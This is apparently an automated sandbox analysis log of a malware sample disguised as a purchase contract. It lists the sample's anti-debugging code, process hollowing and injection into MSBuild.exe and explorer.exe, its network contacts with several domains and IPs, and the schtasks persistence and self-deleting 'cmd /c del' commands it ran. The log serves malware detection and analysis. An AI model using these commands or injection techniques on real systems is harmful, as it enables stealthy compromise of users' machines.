Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h] 9_2_04BB1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h] 9_2_04BB1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h] 9_2_04BB1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h] 9_2_04BB1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB1C06 mov eax, dword ptr fs:[00000030h] 9_2_04BB1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B76C0A mov eax, dword ptr fs:[00000030h] 9_2_04B76C0A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B76C0A mov eax, dword ptr fs:[00000030h] 9_2_04B76C0A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B76C0A mov eax, dword ptr fs:[00000030h] 9_2_04B76C0A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B76C0A mov eax, dword ptr fs:[00000030h] 9_2_04B76C0A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B2AC7B mov eax, dword ptr fs:[00000030h] 9_2_04B2AC7B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B2AC7B mov eax, dword ptr fs:[00000030h] 9_2_04B2AC7B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B2AC7B mov eax, dword ptr fs:[00000030h] 9_2_04B2AC7B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B2AC7B mov eax, dword ptr fs:[00000030h] 9_2_04B2AC7B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B2AC7B mov eax, dword ptr fs:[00000030h] 9_2_04B2AC7B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B2AC7B mov eax, dword ptr fs:[00000030h] 9_2_04B2AC7B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B2AC7B mov eax, dword ptr fs:[00000030h] 9_2_04B2AC7B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B2AC7B mov eax, dword ptr fs:[00000030h] 9_2_04B2AC7B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B2AC7B mov eax, dword ptr fs:[00000030h] 9_2_04B2AC7B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B2AC7B mov eax, dword ptr fs:[00000030h] 9_2_04B2AC7B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B2AC7B mov eax, dword ptr fs:[00000030h] 9_2_04B2AC7B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B1746D mov eax, dword ptr fs:[00000030h] 9_2_04B1746D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B8C450 mov eax, dword ptr fs:[00000030h] 9_2_04B8C450
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B8C450 mov eax, dword ptr fs:[00000030h] 9_2_04B8C450
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B2A44B mov eax, dword ptr fs:[00000030h] 9_2_04B2A44B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B21DB5 mov eax, dword ptr fs:[00000030h] 9_2_04B21DB5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B21DB5 mov eax, dword ptr fs:[00000030h] 9_2_04B21DB5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B21DB5 mov eax, dword ptr fs:[00000030h] 9_2_04B21DB5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BC05AC mov eax, dword ptr fs:[00000030h] 9_2_04BC05AC
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BC05AC mov eax, dword ptr fs:[00000030h] 9_2_04BC05AC
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B235A1 mov eax, dword ptr fs:[00000030h] 9_2_04B235A1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04AF2D8A mov eax, dword ptr fs:[00000030h] 9_2_04AF2D8A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04AF2D8A mov eax, dword ptr fs:[00000030h] 9_2_04AF2D8A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04AF2D8A mov eax, dword ptr fs:[00000030h] 9_2_04AF2D8A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04AF2D8A mov eax, dword ptr fs:[00000030h] 9_2_04AF2D8A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04AF2D8A mov eax, dword ptr fs:[00000030h] 9_2_04AF2D8A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B2FD9B mov eax, dword ptr fs:[00000030h] 9_2_04B2FD9B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B2FD9B mov eax, dword ptr fs:[00000030h] 9_2_04B2FD9B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B22581 mov eax, dword ptr fs:[00000030h] 9_2_04B22581
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B22581 mov eax, dword ptr fs:[00000030h] 9_2_04B22581
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B22581 mov eax, dword ptr fs:[00000030h] 9_2_04B22581
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B22581 mov eax, dword ptr fs:[00000030h] 9_2_04B22581
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB2D82 mov eax, dword ptr fs:[00000030h] 9_2_04BB2D82
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB2D82 mov eax, dword ptr fs:[00000030h] 9_2_04BB2D82
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB2D82 mov eax, dword ptr fs:[00000030h] 9_2_04BB2D82
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB2D82 mov eax, dword ptr fs:[00000030h] 9_2_04BB2D82
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB2D82 mov eax, dword ptr fs:[00000030h] 9_2_04BB2D82
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB2D82 mov eax, dword ptr fs:[00000030h] 9_2_04BB2D82
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB2D82 mov eax, dword ptr fs:[00000030h] 9_2_04BB2D82
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BA8DF1 mov eax, dword ptr fs:[00000030h] 9_2_04BA8DF1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B0D5E0 mov eax, dword ptr fs:[00000030h] 9_2_04B0D5E0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B0D5E0 mov eax, dword ptr fs:[00000030h] 9_2_04B0D5E0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BBFDE2 mov eax, dword ptr fs:[00000030h] 9_2_04BBFDE2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BBFDE2 mov eax, dword ptr fs:[00000030h] 9_2_04BBFDE2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BBFDE2 mov eax, dword ptr fs:[00000030h] 9_2_04BBFDE2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BBFDE2 mov eax, dword ptr fs:[00000030h] 9_2_04BBFDE2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B76DC9 mov eax, dword ptr fs:[00000030h] 9_2_04B76DC9
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B76DC9 mov eax, dword ptr fs:[00000030h] 9_2_04B76DC9
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B76DC9 mov eax, dword ptr fs:[00000030h] 9_2_04B76DC9
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B76DC9 mov ecx, dword ptr fs:[00000030h] 9_2_04B76DC9
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B76DC9 mov eax, dword ptr fs:[00000030h] 9_2_04B76DC9
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B76DC9 mov eax, dword ptr fs:[00000030h] 9_2_04B76DC9
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B7A537 mov eax, dword ptr fs:[00000030h] 9_2_04B7A537
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BBE539 mov eax, dword ptr fs:[00000030h] 9_2_04BBE539
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h] 9_2_04B03D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h] 9_2_04B03D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h] 9_2_04B03D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h] 9_2_04B03D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h] 9_2_04B03D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h] 9_2_04B03D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h] 9_2_04B03D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h] 9_2_04B03D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h] 9_2_04B03D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h] 9_2_04B03D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h] 9_2_04B03D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h] 9_2_04B03D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B03D34 mov eax, dword ptr fs:[00000030h] 9_2_04B03D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BC8D34 mov eax, dword ptr fs:[00000030h] 9_2_04BC8D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B24D3B mov eax, dword ptr fs:[00000030h] 9_2_04B24D3B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B24D3B mov eax, dword ptr fs:[00000030h] 9_2_04B24D3B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B24D3B mov eax, dword ptr fs:[00000030h] 9_2_04B24D3B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04AFAD30 mov eax, dword ptr fs:[00000030h] 9_2_04AFAD30
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B1C577 mov eax, dword ptr fs:[00000030h] 9_2_04B1C577
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B1C577 mov eax, dword ptr fs:[00000030h] 9_2_04B1C577
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B17D50 mov eax, dword ptr fs:[00000030h] 9_2_04B17D50
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B33D43 mov eax, dword ptr fs:[00000030h] 9_2_04B33D43
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B73540 mov eax, dword ptr fs:[00000030h] 9_2_04B73540
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BA3D40 mov eax, dword ptr fs:[00000030h] 9_2_04BA3D40
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B746A7 mov eax, dword ptr fs:[00000030h] 9_2_04B746A7
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BC0EA5 mov eax, dword ptr fs:[00000030h] 9_2_04BC0EA5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BC0EA5 mov eax, dword ptr fs:[00000030h] 9_2_04BC0EA5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BC0EA5 mov eax, dword ptr fs:[00000030h] 9_2_04BC0EA5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B8FE87 mov eax, dword ptr fs:[00000030h] 9_2_04B8FE87
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B216E0 mov ecx, dword ptr fs:[00000030h] 9_2_04B216E0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B076E2 mov eax, dword ptr fs:[00000030h] 9_2_04B076E2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BC8ED6 mov eax, dword ptr fs:[00000030h] 9_2_04BC8ED6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B38EC7 mov eax, dword ptr fs:[00000030h] 9_2_04B38EC7
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BAFEC0 mov eax, dword ptr fs:[00000030h] 9_2_04BAFEC0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B236CC mov eax, dword ptr fs:[00000030h] 9_2_04B236CC
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BAFE3F mov eax, dword ptr fs:[00000030h] 9_2_04BAFE3F
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04AFE620 mov eax, dword ptr fs:[00000030h] 9_2_04AFE620
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B2A61C mov eax, dword ptr fs:[00000030h] 9_2_04B2A61C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B2A61C mov eax, dword ptr fs:[00000030h] 9_2_04B2A61C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04AFC600 mov eax, dword ptr fs:[00000030h] 9_2_04AFC600
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04AFC600 mov eax, dword ptr fs:[00000030h] 9_2_04AFC600
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04AFC600 mov eax, dword ptr fs:[00000030h] 9_2_04AFC600
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B28E00 mov eax, dword ptr fs:[00000030h] 9_2_04B28E00
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB1608 mov eax, dword ptr fs:[00000030h] 9_2_04BB1608
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B1AE73 mov eax, dword ptr fs:[00000030h] 9_2_04B1AE73
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B1AE73 mov eax, dword ptr fs:[00000030h] 9_2_04B1AE73
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B1AE73 mov eax, dword ptr fs:[00000030h] 9_2_04B1AE73
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B1AE73 mov eax, dword ptr fs:[00000030h] 9_2_04B1AE73
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B1AE73 mov eax, dword ptr fs:[00000030h] 9_2_04B1AE73
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B0766D mov eax, dword ptr fs:[00000030h] 9_2_04B0766D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B07E41 mov eax, dword ptr fs:[00000030h] 9_2_04B07E41
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B07E41 mov eax, dword ptr fs:[00000030h] 9_2_04B07E41
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B07E41 mov eax, dword ptr fs:[00000030h] 9_2_04B07E41
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B07E41 mov eax, dword ptr fs:[00000030h] 9_2_04B07E41
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B07E41 mov eax, dword ptr fs:[00000030h] 9_2_04B07E41
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B07E41 mov eax, dword ptr fs:[00000030h] 9_2_04B07E41
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BBAE44 mov eax, dword ptr fs:[00000030h] 9_2_04BBAE44
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BBAE44 mov eax, dword ptr fs:[00000030h] 9_2_04BBAE44
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B77794 mov eax, dword ptr fs:[00000030h] 9_2_04B77794
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B77794 mov eax, dword ptr fs:[00000030h] 9_2_04B77794
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B77794 mov eax, dword ptr fs:[00000030h] 9_2_04B77794
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B08794 mov eax, dword ptr fs:[00000030h] 9_2_04B08794
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B337F5 mov eax, dword ptr fs:[00000030h] 9_2_04B337F5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04AF4F2E mov eax, dword ptr fs:[00000030h] 9_2_04AF4F2E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04AF4F2E mov eax, dword ptr fs:[00000030h] 9_2_04AF4F2E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B2E730 mov eax, dword ptr fs:[00000030h] 9_2_04B2E730
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B1B73D mov eax, dword ptr fs:[00000030h] 9_2_04B1B73D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B1B73D mov eax, dword ptr fs:[00000030h] 9_2_04B1B73D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B1F716 mov eax, dword ptr fs:[00000030h] 9_2_04B1F716
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B8FF10 mov eax, dword ptr fs:[00000030h] 9_2_04B8FF10
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B8FF10 mov eax, dword ptr fs:[00000030h] 9_2_04B8FF10
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BC070D mov eax, dword ptr fs:[00000030h] 9_2_04BC070D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BC070D mov eax, dword ptr fs:[00000030h] 9_2_04BC070D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B2A70E mov eax, dword ptr fs:[00000030h] 9_2_04B2A70E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B2A70E mov eax, dword ptr fs:[00000030h] 9_2_04B2A70E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B0FF60 mov eax, dword ptr fs:[00000030h] 9_2_04B0FF60
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BC8F6A mov eax, dword ptr fs:[00000030h] 9_2_04BC8F6A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B0EF40 mov eax, dword ptr fs:[00000030h] 9_2_04B0EF40
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B2F0BF mov ecx, dword ptr fs:[00000030h] 9_2_04B2F0BF
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B2F0BF mov eax, dword ptr fs:[00000030h] 9_2_04B2F0BF
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B2F0BF mov eax, dword ptr fs:[00000030h] 9_2_04B2F0BF
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B220A0 mov eax, dword ptr fs:[00000030h] 9_2_04B220A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B220A0 mov eax, dword ptr fs:[00000030h] 9_2_04B220A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B220A0 mov eax, dword ptr fs:[00000030h] 9_2_04B220A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B220A0 mov eax, dword ptr fs:[00000030h] 9_2_04B220A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B220A0 mov eax, dword ptr fs:[00000030h] 9_2_04B220A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B220A0 mov eax, dword ptr fs:[00000030h] 9_2_04B220A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B390AF mov eax, dword ptr fs:[00000030h] 9_2_04B390AF
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04AF9080 mov eax, dword ptr fs:[00000030h] 9_2_04AF9080
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B73884 mov eax, dword ptr fs:[00000030h] 9_2_04B73884
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B73884 mov eax, dword ptr fs:[00000030h] 9_2_04B73884
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04AF58EC mov eax, dword ptr fs:[00000030h] 9_2_04AF58EC
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04AF40E1 mov eax, dword ptr fs:[00000030h] 9_2_04AF40E1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04AF40E1 mov eax, dword ptr fs:[00000030h] 9_2_04AF40E1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04AF40E1 mov eax, dword ptr fs:[00000030h] 9_2_04AF40E1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B1B8E4 mov eax, dword ptr fs:[00000030h] 9_2_04B1B8E4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B1B8E4 mov eax, dword ptr fs:[00000030h] 9_2_04B1B8E4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B8B8D0 mov eax, dword ptr fs:[00000030h] 9_2_04B8B8D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B8B8D0 mov ecx, dword ptr fs:[00000030h] 9_2_04B8B8D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B8B8D0 mov eax, dword ptr fs:[00000030h] 9_2_04B8B8D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B8B8D0 mov eax, dword ptr fs:[00000030h] 9_2_04B8B8D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B8B8D0 mov eax, dword ptr fs:[00000030h] 9_2_04B8B8D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B8B8D0 mov eax, dword ptr fs:[00000030h] 9_2_04B8B8D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B1A830 mov eax, dword ptr fs:[00000030h] 9_2_04B1A830
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B1A830 mov eax, dword ptr fs:[00000030h] 9_2_04B1A830
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B1A830 mov eax, dword ptr fs:[00000030h] 9_2_04B1A830
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B1A830 mov eax, dword ptr fs:[00000030h] 9_2_04B1A830
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B0B02A mov eax, dword ptr fs:[00000030h] 9_2_04B0B02A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B0B02A mov eax, dword ptr fs:[00000030h] 9_2_04B0B02A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B0B02A mov eax, dword ptr fs:[00000030h] 9_2_04B0B02A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B0B02A mov eax, dword ptr fs:[00000030h] 9_2_04B0B02A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B2002D mov eax, dword ptr fs:[00000030h] 9_2_04B2002D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B2002D mov eax, dword ptr fs:[00000030h] 9_2_04B2002D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B2002D mov eax, dword ptr fs:[00000030h] 9_2_04B2002D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B2002D mov eax, dword ptr fs:[00000030h] 9_2_04B2002D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B2002D mov eax, dword ptr fs:[00000030h] 9_2_04B2002D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B77016 mov eax, dword ptr fs:[00000030h] 9_2_04B77016
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B77016 mov eax, dword ptr fs:[00000030h] 9_2_04B77016
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B77016 mov eax, dword ptr fs:[00000030h] 9_2_04B77016
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BC4015 mov eax, dword ptr fs:[00000030h] 9_2_04BC4015
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BC4015 mov eax, dword ptr fs:[00000030h] 9_2_04BC4015
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04BB2073 mov eax, dword ptr fs:[00000030h] 9_2_04BB2073
Enables debug privileges
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\explorer.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.mtsnurulislamsby.com
Source: C:\Windows\explorer.exe Network Connect: 209.99.40.222 80
Source: C:\Windows\explorer.exe Network Connect: 160.153.136.3 80
Source: C:\Windows\explorer.exe Network Connect: 217.160.0.129 80
Source: C:\Windows\explorer.exe Network Connect: 198.71.233.107 80
Source: C:\Windows\explorer.exe Domain query: www.lifestylebykendra.com
Source: C:\Windows\explorer.exe Domain query: www.cypios.net
Source: C:\Windows\explorer.exe Domain query: www.ascope.club
Source: C:\Windows\explorer.exe Network Connect: 95.215.210.10 80
Source: C:\Windows\explorer.exe Network Connect: 199.34.228.189 80
Source: C:\Windows\explorer.exe Domain query: www.wintonplaceoh.com
Source: C:\Windows\explorer.exe Domain query: www.narrowpathwc.com
Source: C:\Windows\explorer.exe Domain query: www.5fashionfix.net
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Domain query: www.braun-mathematik.online
Source: C:\Windows\explorer.exe Domain query: www.teamtacozzzz.com
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Maps a DLL or memory area into another process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread register set: target process: 3424 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Thread register set: target process: 3424 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section unmapped: C:\Windows\SysWOW64\explorer.exe base address: 180000 Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: E9C008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\nzRFOjxWpomfsw' /XML 'C:\Users\user\AppData\Local\Temp\tmpC4FD.tmp' Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe' Jump to behavior
